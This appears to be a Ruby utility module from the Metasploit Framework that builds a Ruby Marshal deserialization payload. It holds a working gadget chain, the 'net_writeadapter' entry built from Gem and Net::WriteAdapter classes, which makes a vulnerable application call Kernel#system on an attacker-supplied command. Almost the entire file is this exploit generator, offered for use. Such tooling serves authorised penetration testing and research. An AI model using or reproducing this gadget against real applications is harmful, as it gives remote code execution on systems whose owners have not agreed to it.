1
# -*- coding: binary -*-
2

3
# Ruby deserialization Utility
4
module Msf
5
  module Util
6
    # Ruby deserialization class
7
    class RubyDeserialization
8
      # That could be in the future a list of payloads used to exploit the Ruby deserialization vulnerability.
9
      PAYLOADS = {
10
        # https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
11
        net_writeadapter: proc do |command|
12
          "\x04\b[\bc\x15Gem::SpecFetcherc\x13Gem::InstallerU:\x15Gem::Requirement" \
13
          "[\x06o:\x1CGem::Package::TarReader\x06:\b@ioo:\x14Net::BufferedIO\a;\ao:" \
14
          "#Gem::Package::TarReader::Entry\a:\n@readi\x00:\f@headerI#{Marshal.dump(Rex::Text.rand_text_alphanumeric(12..20))[2..-1]}" \
15
          "\x06:\x06ET:\x12@debug_outputo:\x16Net::WriteAdapter\a:\f@socketo:\x14" \
16
          "Gem::RequestSet\a:\n@setso;\x0E\a;\x0Fm\vKernel:\x0F@method_id:\vsystem:\r" \
17
          "@git_setI#{Marshal.dump(command)[2..-1]}\x06;\fT;\x12:\fresolve"
18
        end
19
      }
20

21
      def self.payload(payload_name, command = nil)
22

23
        raise ArgumentError, "#{payload_name} payload not found in payloads" unless payload_names.include? payload_name.to_sym
24

25
        PAYLOADS[payload_name.to_sym].call(command)
26
      end
27

28
      def self.payload_names
29
        PAYLOADS.keys
30
      end
31

32
    end
33
  end
34
end
35

36